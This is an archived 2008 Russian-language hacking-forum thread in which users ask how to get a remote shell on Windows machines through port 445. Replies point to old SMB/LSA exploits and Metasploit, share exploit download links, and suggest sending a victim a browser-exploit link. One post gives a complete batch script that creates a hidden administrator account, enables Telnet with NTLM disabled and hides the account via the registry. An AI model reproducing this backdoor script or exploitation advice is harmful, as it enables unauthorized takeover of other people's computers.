получение cmd через порт 445, возможно ли? [Архив]

PDA

Просмотр полной версии : получение cmd через порт 445, возможно ли?

m-Xacker

19.09.2008, 01:39

Здраствуйте!
Хотелось бы узнать возможно ли получить теленет через порт 445, если да то каким софтом?

Don1=2

19.09.2008, 02:06

нет

cardons

19.09.2008, 03:17

нет
Можно если машинка давно не обновлялась и в ней есть уязвимость MS04–011

MaSTeR GэN

19.09.2008, 08:48

TC иcчи в гугле экплоит КАНТ года 2003 )Но машин с этой уязвимостью очень мало )

SVAROG

19.09.2008, 08:57

в моей локалке таких тачек дохера, уязвимость существует в винде СП1 с открытым 445 портом, юзай metasploit

F1shka

19.09.2008, 12:51

Еще можно через кмд файлик (создаёшь текставик, пихаешь текст, сохранить как *cmd)

==========
chcp 1251

net user admin admin /add

net localgroup Администраторы admin /add

sc config tlntsvr start= auto

tlntadmn config port=23 sec=-NTLM

net start Telnet

REG ADD "HKLM\SOFTWARE\Microsoft\Win
dowsNT\CurrentVersion\Winlogon\SpecialAccounts\Use rList\admin" /v admin /t reg_d
word /d 0000000

==============

m-Xacker

19.09.2008, 13:01

не тут вопрос в другом , есть эксплот MS06-035 который перезагружает машины, через порт 445 , вот я и хотел спросить есть ли такой эксплот под порт 445 но только с выводом удалённой командной строки , типа kaht :confused:

F1shka

19.09.2008, 13:07

Что за софт юзаешь? Залейка на вебфайл

m-Xacker

19.09.2008, 13:37

Что за софт юзаешь? Залейка на вебфайл

держи ))) токак всю сеть не вали разом
http://depositfiles.com/ru/files/8071822

m-Xacker

19.09.2008, 19:02

И тишина .... :rolleyes:

.nor

19.09.2008, 19:56

http://www.milw0rm.com/exploits/3746 ?
Хотя врятли актуально

bons

19.09.2008, 20:43

_http://slil.ru/26161734
старая штука. Пасс к архиву 1

m-Xacker

20.09.2008, 02:39

_http://slil.ru/26161734
старая штука. Пасс к архиву 1

полная фигня)))

.nor - я так и не разобрался но похоже там какие то исходники (((

неможет быть такого что эксплот для порта на перезагрузку есть, а для удалённой cmd сделать нельзя, я чуствую есть такой эксплот просто светить не хотят люди, ну кинте хоть в личку ссылку ;)

hacker4all

20.09.2008, 04:11

Ты метасплоит поставь и попробуй все баги MS и либу ASN или хз не помню ща че там... а то мне сканер не находил баги которые сработали... Да и бага под ИЕ актуальна 2006г... Линку жертве и гуд ))
Вывод: Метасплоит, если трудности с консолью веб интерфейс быстрее сделает ))

F1shka

20.09.2008, 15:32

Вот кстати ничего так)
http://video.antichat.ru/file182.html

helat

22.09.2008, 00:44

найди сполит ЛСА (lsa )
обычно катит на сп1 без обновлений

F1shka

27.09.2008, 10:30

найди сполит ЛСА (lsa )
обычно катит на сп1 без обновлений
Кроме lsa ещё есть rpc_gui_v2.0 кто найдёт огребет в репу от меня ( РАБОЧЕИ (!!!) ПРОГИ )